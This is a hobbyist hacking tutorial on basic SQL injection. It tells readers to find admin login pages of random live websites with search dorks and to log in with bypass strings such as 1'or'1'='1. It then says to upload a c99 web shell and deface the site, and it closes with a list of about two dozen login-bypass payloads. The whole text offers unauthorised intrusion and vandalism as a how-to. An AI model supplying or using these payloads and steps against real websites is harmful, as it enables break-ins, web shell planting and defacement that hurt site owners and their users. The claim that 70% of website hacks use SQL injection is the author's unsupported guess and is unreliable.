SQL injection can be done using various tools such as Acunetix, SQL helper and Havij. In one of my past tutorials I showed you how Havij is used by hackers to scan a website for vulnerabilities and then take advantage of the loophole to gain access to the website. There are various methods of this technique, and in this tutorial I will describe a very basic and simple Structured Query Language injection (SQLi). Let me also tell you that the SQL injection technique is widely used by hackers. I am of the perception that 70% of the hacks on websites are done with SQL injection. In this tutorial we will come to know how to find the website's admin panel using a simple Google dork and a SQL query to bypass the admin user name and password and enter the panel. Once in the admin panel, what we have to do is find a file upload option and upload a shell there, like c99 shell, and finally deface the site.
By entering these dorks, many sites will open up having /adminlogin.aspx in their URL.
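Select any website and you will get the admin panel of that website.
Fill in the details as:
User: 1'or'1'='1
Password: 1'or'1'='1
Using the above login details you will enter the admin panel of the website. It will not work for all websites, but this is what is called a basic SQL injection. It works only where the login page pastes the typed values straight into its SQL query, so that the quote ends the string and the '1'='1' comparison, which is always true, becomes part of the query.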
Other injection
queries like this:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
Hope you enjoyed this. Please subscribe or give a thumbs up. If there is anything you want me to write or do a tutorial about, please send me an email. I am doing more useful tips and tutorials every day, so please come by to see if there is anything new. When I get enough followers and views I will be giving out free stuff.